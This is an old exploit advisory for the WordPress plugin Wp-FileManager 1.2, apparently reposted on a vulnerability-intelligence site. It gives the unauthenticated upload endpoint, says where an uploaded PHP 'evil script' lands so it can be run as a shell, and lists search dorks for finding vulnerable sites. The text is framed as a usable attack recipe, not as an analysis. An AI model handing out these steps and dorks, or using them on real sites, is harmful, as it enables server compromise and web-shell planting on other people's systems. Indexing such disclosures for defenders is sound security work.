Lucene search
wpfile-upload.txt
Wordpress Plugin Vulnerability: Wp-FileManager allows remote file upload, leading to potential shell upload exploit
Show more
`######################################################################################
# AUTHOR : H-T TeaM {HouSSaMix _ ToXiC350} #
# HOME : http://no-hack.net #
# Script : Wordpress Plugin Wp-FileManager #
# Download : http://downloads.wordpress.org/plugin/wp-filemanager.1.2.zip #
# BUG : Remote File Upload Vulnerability [ Shell Upload Exploit ] #
######################################################################################
(~)| 3xpl0it4t10n :
This file allowed you to upload directly a PHP script or anything you want it
You have just to enter into :
http://[TARGEt]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php
After uploading you evil script you will find it in this directory :
http://[TARGEt]/[path_wordpress]/uploaded/[evil].(php)
HeRe we are some dorks :
plugins/wp-filemanager/
inurl:/wp-filemanager/
# greezt : GoLd_M , RoMaNcYxHaCkEr , DDos , and all muslims Hackers
######################################################################################
# H-T TeaM {HouSSaMix _ ToXiC350} #
######################################################################################
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo07 Jan 2008 00:00Current
7.4High risk
Vulners AI Score7.4